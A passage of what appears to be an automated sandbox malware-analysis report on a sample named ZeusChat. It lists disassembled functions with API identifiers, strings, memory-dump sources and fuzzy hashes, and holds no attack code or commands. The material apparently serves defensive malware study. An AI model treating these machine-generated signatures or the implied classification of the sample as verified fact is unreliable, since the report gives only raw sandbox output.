                                                                                                      • Instruction Fuzzy Hash: 17C1F032B19A458AEB14EF64D9803BC7761EB897A8F484235DE2E5B7E4CF78D019C350
                                                                                                      Function 00007FF7520ACB9C Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 3210457359-0
                                                                                                      • Opcode ID: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                                                                                                      • Instruction ID: 57e9075e317bc2774a7219d010a119351bc89fb64a563bc54f8effe68e9dc11c
                                                                                                      • Opcode Fuzzy Hash: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                                                                                                      • Instruction Fuzzy Hash: F961C436A0A54386F7B8BA259C543B9A711AF407A4FDE8031DA1D066E5CFBCE849D330
                                                                                                      Function 00007FF7520424E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                      • String ID: ?
                                                                                                      • API String ID: 500310315-1684325040
                                                                                                      • Opcode ID: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                                                                                                      • Instruction ID: 8c4d5c01432b27623de59356dd38ced50c39eb1dfc3a6c3e23dbbabd9fe71f92
                                                                                                      • Opcode Fuzzy Hash: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                                                                                                      • Instruction Fuzzy Hash: 8961B332E096428AE760BF21ED405A9F7A5FF84784FD84136E94D43A94DFBCD948C760
                                                                                                      Function 00007FF7520B12A4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                      • API String ID: 3721556410-2107944366
                                                                                                      • Opcode ID: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                                                                                                      • Instruction ID: ae6a35c8b56d03921391f13bc1672e2540fbe542c7e7bb3b255e9c8987e980de
                                                                                                      • Opcode Fuzzy Hash: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                                                                                                      • Instruction Fuzzy Hash: 9261AF36A16A5285EB50EF61DC806EDB771FB44B98FC80132DD0D13AA9DFB8E54AC310
                                                                                                      Function 00007FF75207A6DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                      • String ID: 2$P
                                                                                                      • API String ID: 93392585-1110268094
                                                                                                      • Opcode ID: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                      • Instruction ID: 287a735dcf3110af81f17f87a946e505ee0e885b175c47c231f68b309516abf3
                                                                                                      • Opcode Fuzzy Hash: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                      • Instruction Fuzzy Hash: F4511532E0665289F7A4BF61DC402BDB7A1FB00758FAC4135CA5E13A95CFB8E44AC760
                                                                                                      Function 00007FF75207B400 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                      • API String ID: 4060274358-404129466
                                                                                                      • Opcode ID: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                      • Instruction ID: 57d992349e3a7086d000bbb1a3110d4cab8fc554059b0a4880102b7abccea9a9
                                                                                                      • Opcode Fuzzy Hash: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                      • Instruction Fuzzy Hash: 88218B26B0FB8282FA60BB16AC4017AE351BF54784F9C5031DE4D02796EFFCE409C220
                                                                                                      Function 00007FF75207CC44 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                      • API String ID: 4051287042-3128320259
                                                                                                      • Opcode ID: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                      • Instruction ID: c51645de741d8471bcce065ea3d1435ee8ea7719e929857acda272cbdb928d47
                                                                                                      • Opcode Fuzzy Hash: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                      • Instruction Fuzzy Hash: 0A116571B19B8191D774AB10F8457EEA760FB88744FC80436D64E42B58DEBCD54DC760
                                                                                                      Function 00007FF7520B29E4 Relevance: 12.3, APIs: 8, Instructions: 254windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1211466189-0
                                                                                                      • Opcode ID: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                      • Instruction ID: d141f9cae5aff5ae06ba1710d7fa8afdf2c3fe322c791f4594b41d0d15affd00
                                                                                                      • Opcode Fuzzy Hash: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                      • Instruction Fuzzy Hash: CFA1023671A5438AE778AF25994477EB7A1FB84B44F985035DA0E43AA0DF7CEC58C310
                                                                                                      Function 00007FF75202428C Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1268545403-0
                                                                                                      • Opcode ID: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                      • Instruction ID: 32d9c6c72d0e858702c3654a6d06b3255961838e2192d74a93eb6d30b6f56870
                                                                                                      • Opcode Fuzzy Hash: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                      • Instruction Fuzzy Hash: 4F51A631E0E18289F7A5BF29ED8437D9B959F81B44F9C4072C90E462D5CEEDB88CC264
                                                                                                      Function 00007FF7520A991C Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3864802216-0
                                                                                                      • Opcode ID: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                      • Instruction ID: 7e933a9cdace1976c377fffec0af35417a99dbd53fd588ca552c31563d549c0a
                                                                                                      • Opcode Fuzzy Hash: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                      • Instruction Fuzzy Hash: 0041AC3661968187E7749F21A854B6EBBA1F798B91F588035EF8E03B54DF7CD848CB00
                                                                                                      Function 00007FF752040A4C Relevance: 10.8, APIs: 7, Instructions: 294COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                      • Instruction ID: 3d487a865b1007426b28a19906e3f2731eaab4becc4dfdced1a8c4b5293d2dc3
                                                                                                      • Opcode Fuzzy Hash: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                      • Instruction Fuzzy Hash: C9C11A22E1E68685E668BF159C0027EAB52BB90784FDD8135DA4E173D1CFBDE44CC3A0
                                                                                                      Function 00007FF752081250 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • #77.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF75208133B
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF752081391
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF752081478
                                                                                                      • #24.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF75208149F
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF7520814B0
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF75208151E
                                                                                                      • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF752080CA8,?,?,00000000,00007FF7520986CF), ref: 00007FF752081593
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                      • Instruction ID: e29aef4c7ab13af659496d30c8031951c67cf313d4fa41fee6e6c7f7accd73c5
                                                                                                      • Opcode Fuzzy Hash: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                      • Instruction Fuzzy Hash: 89A1A022A0AA1286FB50AF55C8843BEE761FF44B84F895432DE0D97795DFBCE449C360
                                                                                                      Function 00007FF7520B02A8 Relevance: 10.7, APIs: 7, Instructions: 212windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$Enabled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3694350264-0
                                                                                                      • Opcode ID: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                      • Instruction ID: c21f6ffe01c115e00814616c76552bf7c7743277d67fd0957663a9c8d11a3e69
                                                                                                      • Opcode Fuzzy Hash: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                                                                                                      • Instruction Fuzzy Hash: F6916261E5A64646FBB4AA159C843BFB796AB44B40FCC4032CA5D03691DFBDEC99C320
                                                                                                      Function 00007FF7520AB0F8 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                      • String ID:
                                                                                                      • API String ID: 161812096-0
                                                                                                      • Opcode ID: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                                                                                                      • Instruction ID: 595d971d12474c96f1dddbeb015cc51281f6e00656263daa2b5fcc5641df11ca
                                                                                                      • Opcode Fuzzy Hash: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                                                                                                      • Instruction Fuzzy Hash: 32417036A06B4185E7A0EF62DC806AD77B1FB94B94F984136DE0D17764CFB8D449C720
                                                                                                      Function 00007FF7520AB754 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                      • String ID: Msctls_Progress32
                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                      • Opcode ID: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                                                                                                      • Instruction ID: 510ec2c446c04c35f65f5c3a827c17e7f8cb9ffc2feb4859217137e4d6108419
                                                                                                      • Opcode Fuzzy Hash: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                                                                                                      • Instruction Fuzzy Hash: AA313736A096818BE3B09F25F894B1AB761EB88790F549139DA9D03F58CF7CD849CB10
                                                                                                      Function 00007FF75208368C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                      • String ID: SCRIPT
                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                      • Opcode ID: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                                                                                                      • Instruction ID: 99f3287d31c6a20bfd1baf47dbac48077288fef39ab6f6e0910ed262ffc6ad28
                                                                                                      • Opcode Fuzzy Hash: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                                                                                                      • Instruction Fuzzy Hash: AA21B37670AB4182EB64DB22E844B2AA7A0FB89FC8F484035DE4D43B54DF7CE809C710
                                                                                                      Function 00007FF75200D6F0 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
